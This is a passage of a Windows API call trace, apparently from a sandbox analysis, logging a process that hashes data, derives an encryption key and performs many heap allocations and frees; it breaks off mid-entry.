CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0082.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3848, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0082.064] CryptHashData (hHash=0x41ac140, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0082.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.064] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0082.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c37a0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0082.064] CryptDeriveKey (in: hProv=0x41a4040, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac180) returned 1 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a70 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39f8 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3aa0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3ad0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0082.065] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0082.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0082.065] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0082.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0082.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.066] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0082.066] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3800 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3770 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3818 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3638 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c35a8 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c36b0 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c35c0 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3830 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0082.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3848 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c35f0 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3680 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3668 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3758 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3590 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3620 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0082.067] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0082.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3650 [0082.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0082.067] PeekMessageW (in: lpMsg=0x144e1ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1ac) returned 0 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0082.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a58 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0082.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3950 [0082.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a10 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3980 [0082.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a10 | out: hHeap=0x1780000) returned 1 [0082.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3980 | out: hHeap=0x1780000) returned 1 [0082.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39b0 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b48 [0082.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c39b0 | out: hHeap=0x1780000) returned 1 [0082.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b48 | out: hHeap=0x1780000) returned 1 [0082.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3968 [0082.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797008 [0082.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0082.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3968 | out: hHeap=0x1780000) returned 1 [0082.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0082.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0082.094] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0082.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0082.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0082.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0082.094] CryptDestroyHash (hHash=0x41ac140) returned 1 [0082.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0082.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3890 [0082.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38a8 [0082.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3aa0 [0082.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3aa0 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38a8 | out: hHeap=0x1780000) returned 1 [0082.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b18 [0082.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3908 [0082.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38d8 [0082.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38d8 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3908 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3950 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a58 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3890 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b18 | out: hHeap=0x1780000) returned 1 [0082.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0082.096] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0082.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0082.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0082.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 